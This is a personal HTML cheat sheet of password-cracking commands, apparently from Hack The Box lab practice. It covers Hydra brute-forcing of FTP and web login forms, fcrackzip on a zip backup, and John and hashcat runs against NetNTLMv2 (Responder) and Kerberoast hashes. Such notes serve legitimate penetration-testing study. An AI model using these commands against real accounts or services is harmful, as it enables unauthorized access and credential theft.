<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Password-Cracking</title>
</head><body>findmyhash LM -h AAD3B435B51404EEAAD3B435B51404EE &nbsp;&lt;----example<br/>
&#09; &nbsp; ^&#09;&#09; &#09;^^^^^^<br/>
&#09;Type of hash&#09;&#09;Hash itself<br/>
<br/>
<span style="color: #ff0000"><span style="font-size: 14pt">Hydra</span></span><br/>
<br/>
hydra -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst -u -e s -s 25 192.168.0.15 ftp<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; username list &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; password list &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;params &nbsp; &nbsp; &nbsp;IP address &nbsp; service <br/>
<br/>
<br/>
<b><span style="font-size: 13pt"><span style="color: #ff0000">Hydra against a post request on a website. &nbsp;http-post-form is because it's a post request ^USER^ and ^PASS^ are the variables in the post request - Incorrect username is a string that comes into play when you incorrectly login. - the colon separates the parameters</span></span></b><br/>
<br/>
hydra -l admin -P darkweb2017-top10K.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&amp;password=^PASS^:Incorrect username"<br/>
<br/>
<b><span style="font-size: 13pt"><span style="color: #ff0000">Hydra Post on a forum<br/>
<br/>
</span></span></b>hydra -l harvey -P /usr/share/wordlists/rockyou.txt internal-01.bart.htb http-form-post "/simple_chat/login.php:uname=^USER^&amp;passwd=^PASS^&amp;submit=login:Invalid Username or Password"<br/>
<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">To crack a locked zip file</span></span><br/>
<br/>
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.tar.bz2.zip &nbsp;&lt;--crack a zip file<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; wordlist &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;file<br/>
<br/>
<span style="color: #ff0000"><span style="font-size: 14pt">now, you can unzip the file with the following "if the password is found"</span></span><br/>
<br/>
unzip -P &lt;password&gt; &lt;name of file&gt; <br/>
<br/>
*example unzip -P aaaaaa backup.tar.bz2.zip<br/>
<br/>
<br/>
now you can unzip the file <br/>
<br/>
tar -xjf &lt;filename&gt;<br/>
<br/>
<span style="font-size: 14pt"><span style="color: #ff0000">John Stand Alone Cracker</span></span><br/>
<br/>
john &lt;hashdump&gt; --wordlist /usr/share/wordlists/rockyou.txt<br/>
<br/>
<b><u>Responder</u></b><br/>
<br/>
hashcat32.exe -m 5600 "F:\kali-stuff\Steve_Hashes.txt" "F:\kali-stuff\18_in_1.lst" -r "F:\kali-stuff\NSAKEYv2.rule" -O -w 3 -a 0 <br/>
<br/>
hashcat64.exe -m 5600 "F:\kali-stuff\rules\netntlm-hashes.txt" "F:\kali-stuff\test" -r fuckyou.rule --speed-only &nbsp;--net-ntlmv2 AKA responder hashes<br/>
<br/>
<b><u>Kerberoast</u></b><br/>
<br/>
hashcat32.exe -m 13100 -d 1 -w 4 -a 0 "F:\kali-stuff\pewpewinteresting.txt" "F:\kali-stuff\18_in_1.lst" -r "F:\kali-stuff\NSAKEYv2.rule" -O <br/>
<br/>
hashcat32.exe -m 1000 "F:\kali-stuff\Steve_Hashes.txt" "F:\kali-stuff\18_in_1.lst" -r "F:\kali-stuff\NSAKEYv2.rule" -O -w 3 -a 0 </body></html>